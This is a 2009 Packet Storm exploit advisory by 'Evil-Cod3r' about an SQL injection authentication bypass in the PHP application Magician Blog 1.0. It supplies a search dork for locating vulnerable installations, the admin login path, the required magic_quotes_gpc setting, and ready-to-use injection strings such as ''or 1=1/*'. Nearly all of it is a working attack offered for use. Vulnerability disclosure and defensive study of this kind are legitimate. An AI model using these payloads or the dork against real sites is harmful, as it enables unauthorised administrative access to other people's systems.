Magician Blog 1.0 Authentication Bypass

2009-07-28T00:00:00
ID PACKETSTORM:79695
Type packetstorm
Reporter Evil-Cod3r
Modified 2009-07-28T00:00:00

Description

                                        
                                            `==============================================================================  
_ _ _ _ _ _  
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
[»] ~ Note : Been Repoted The Programed  
==============================================================================  
[»] Magician Blog <= 1.0 (Auth Bypass) SQL injection Valunrability  
==============================================================================  
  
[»] Script: [ Magician v1.0 ]  
[»] Language: [ PHP ]  
[»] home: [ www.4smart.net ]  
[»] Founder: [ Evil-Cod3r <IE7@Windowslive.com - o41@hotmail.Com> ]  
[»] Gr44tz to: [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ]  
[»] Dork: [ "Powered By 4smart" ]  
[»] Price: [ $300 But i Scanned The Nulled !! ]  
  
###########################################################################  
  
You Need magic_quotes_gpc = off  
  
===[ Exploit SQL ]===   
  
[»] http://www.Site.com/path/admin  
[»] Exploit :  
First : 'or 1=1 or ' & or & 'or 1=1/*  
  
  
Author: Evil-Cod3r <-  
  
###########################################################################  
  
  
`